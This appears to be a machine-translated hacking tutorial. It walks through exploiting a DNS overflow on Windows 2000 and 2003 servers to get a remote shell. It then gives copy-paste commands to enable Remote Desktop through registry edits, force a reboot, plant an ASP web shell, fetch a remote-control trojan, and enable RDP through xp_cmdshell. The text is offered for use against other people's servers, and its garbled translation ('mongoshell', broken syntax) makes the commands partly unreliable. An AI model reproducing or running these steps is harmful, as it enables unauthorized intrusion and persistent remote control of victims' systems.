Using shell to launch remote services

1. System 2000

This section briefly describes how to launch DNS overflow attacks. I use dns.exe, and run it under CMD to view its usage parameters and other information. Run the "dns-s IP" command to check whether the target IP Address has a DNS Overflow Vulnerability. In the figure, we can see that the target host has a DNS overflow vulnerability. The operating system is Windows 2000! Then we will launch an overflow attack. After "dns-t 2000all IP 1207" is executed, we will be prompted to detect the shell of port 1100 returned. "Telnet IP 1100" successfully returns the response shell. Note that the directory is c: \ WINNT \ system32, And the words related to Windows 2000 are clearly displayed on the top. Next, we need to write a 3389. reg registry file using the "echo" command. Copy the following code line by line to the shell window and press enter to execute:
Echo Windows Registry Editor Version 5.00> 3389.reg
Echo.> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ netcache]> 3389.reg
Echo "Enabled" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]> 3389.reg
Echo "ShutdownWithoutLogon" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer]> 3389.reg
Echo "EnableAdminTSRemote" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]> 3389.reg
Echo "TSEnabled" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermDD]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ TermService]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_USERS \. DEFAULT \ Keyboard Layout \ Toggle]> 3389.reg
Echo "Hotkey" = "1"> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg

 

The ">" symbol overwrites the written file. If this file is not found, the file is created. If yes, the original content is overwritten. ">" Is the append write, that is, the content written after the original file content. The content is written to the 3389. reg file! Note that the second line is used to write a line of space. The reason is that the format of the. reg file must be the same! After successful writing, perform the import operation and run "regedit/s 3389.reg ". In this way, the Registry file is successfully imported into the registry. However, it should be noted that do not enter any wrong character in Shell shell, otherwise it will not be executed. We recommend that you first lay it in notepad, ensure that it is correct, and then copy it to the shell window for execution. What we need to do is to restart the target server. How can we restart the target server? After testing with many friends, I thought it would be appropriate to use the following method. Run the following code in mongoshell:
@ Echo off & cd/d % temp % & echo [version]> {out}. inf
(Set inf = InstallHinfSection DefaultInstall)
Echo signature = $ chicago $ >>{ out}. inf
Echo [defainstall install] >>{ out}. inf
Rundll32 setupapi, % inf % 1% temp % \ {out}. inf

Copy the preceding five lines of code to mongoshell in sequence, and press enter once. After all the five lines are executed, the server restarts. I will not talk nonsense about the principle or anything. Of course, there are many ways to restart the server, such as killing key processes in the system and simulating code keys. However, I personally think this method recommended above is relatively safe! If no accident occurs, wait for the server to restart and connect to the target to find that the remote desktop service has been successfully enabled. Now, the remote desktop service is successfully enabled under the mongoshell returned after the Windows 2000 operating system overflows.

2. System 2003

Compared with the 2000 system, it is easier to enable the remote desktop service in shell, at least no restart is required! The first method is to use the "echo" command to write a 3389. reg file, and then "regedit/s 3389.reg" to import the Registry file to enable it. This is relatively simple and is similar to the 2000 enabling method described above. Copy the following code line by line to the shell window and press enter to execute:
Echo Windows Registry Editor Version 5.00> 3389.reg
Echo.> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]> 3389.reg
Echo "fDenyTSConnections" = dword: 00000000> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg

After completing the preceding operations, execute the "regedit/s 3389.reg" import to take effect! However, this method is relatively cumbersome and complicated. We can also use another simple method to enable the remote desktop service. Before introducing another operation method, we should first familiarize ourselves with one of the most critical registry key values for Remote Desktop Services in the 2003 system.

In "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"

The value "fDenyTSConnections" indicates that the value is 1 or 0. Disable the remote desktop service when the value is 1, and enable the remote desktop service when the value is 0. In other words, you can enable the remote desktop service by changing the key registry key value data in the cmdshell! Fortunately, there is a "reg" command in 2003 that can do this completely, hey. Here we look for a server with an operating system of 2003, and return an external shell after overflow in the same way as described above. When we try to connect, we will find that the connection cannot be connected at all. The following describes how to use the "reg" command to enable the remote desktop service. Run:

Reg query "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"

We found that the "fDenyTSConnections" key value data is "0x1 ". This is 1 of The hexadecimal number. As mentioned above, if the data is 1, the remote desktop service is not enabled. All we need to do is change "0x1" to "0x0 "! You cannot directly use "reg add". You must delete the original key value before adding it! Run the following command in cmdshell:

Reg delete "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections

Will you ask if "you want to delete the registry value fDenyTSConnections", Of course Yes. Run the following command:

Reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0

Prompt that the operation is successful, 9. In this way, the value of "fDenyTSConnections" is changed to "0x0". We can execute:

Reg query "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"

We can check to see if the data has been successfully changed. Now let's try to connect to server 3389 and find that the connection is successful. Add a user to visit. At this point, the method for enabling remote desktop service by using mongoshell Under 2003 is also described.

4. Others

Of course, you do not have to enable the remote desktop service in mongoshell after overflow. You can echo a vbs file, download the Remote Control Trojan, and run the trojan in mongoshell. It will be OK when the trojan is launched. In addition, you can check whether the target IP address is bound to a website, find the website directory, and use echo as a Trojan (command: echo "<% execute request (" cmd ") %> "> WEB path \ test. asp), and then submit the trojan, upload the 3389 tool and then enable it! In short, there are more than one method, and the goal is a good method.
* ** The following is enabled using the database xp_mongoshell:
Exec xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0/F'
View status
Exec xp_cmdshell 'reg query "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server "'